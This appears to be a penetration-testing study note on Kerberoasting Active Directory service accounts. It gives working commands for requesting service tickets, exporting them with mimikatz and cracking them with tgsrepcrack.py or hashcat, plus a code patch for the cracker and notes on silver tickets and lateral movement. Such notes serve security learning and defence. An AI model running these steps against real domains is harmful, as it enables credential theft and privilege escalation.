The goal of Kerberoasting is to obtain and crack a Kerberos service ticket (“TGS”) to obtain the service encryption key (used to encrypt all service tickets). With the service key, the attacker can create silver ticket.

Goal

Obtain and crack TGS/ST to obtain service secret key / password

krbtgt's password can sometimes also be cracked

If the Windows server lived long enough to have gone through an upgrade from Windows Server 2000 to Windows Server 2003, then the krbtgt account could be using a crackable password. WS2000 doesn’t have strong password requirements, whereas WS2003 (and above) automatically creates very strong passwords for krbtgt. However, the upgrade from WS2000-WS2003 doesn’t enforce regenerating krbtgt key.

Obtain TGS

We start by using KerberosRequestorSecurityToken to request a service ticket:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com'
  • Optional: Use klist to list all currently cached Kerberos tickets for current user and confirm that there is a cached ST.
  • Also possible to use GetUserSPNs.py (part of impacket example scripts, see /usr/share/impacket) to obtain TGS remotely.

After requesting a ticket, use mimikatz to dump the ticket:

.\mimikatz.exe "kerberos::list /export" exit

Automate with Invoke-Kerberoast.ps1

The above steps can be done in one step with Invoke-Kerberoast.ps1 (enumerate all SPNs, request STs, and dump all cached tickets automatically)

Brute-force TGS for encryption key

Use kerberoast package to bruteforce the ticket for the encryption key (service password):

/usr/share/kerberoast/tgsrepcrack.py wordlist.txt TGS.kirbi

NTLM/MD4 is disabled

In newer version of Python, NTLM/MD4 is disabled in hashlib by default. We need to use a workaround to make it work. First install pycryptodome package through pip, then patch ntlmhash() in kerberos.py as follows:

def ntlmhash(s):
    from Crypto.Hash import MD4
    hash = MD4.new()
    hash.update(s.encode('utf-16le'))
    return hash.digest()

Alternatives

Hashcat and john can also be used. (e.g. hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt -O)

This doesn't always work!

Kerberoasting is infeasible if the target account is a managed / group managed service account, which has a 120-character long password.

What’s Next?

Lateral Movement

This attack compels lateral movement if the service account is a domain admin or a local administrator on any domain-joined machine.

Modifying the Service Ticket

By cracking the service password, the attacker can forge a service ticket into a silver ticket to obtain maximum privilege to the service principal.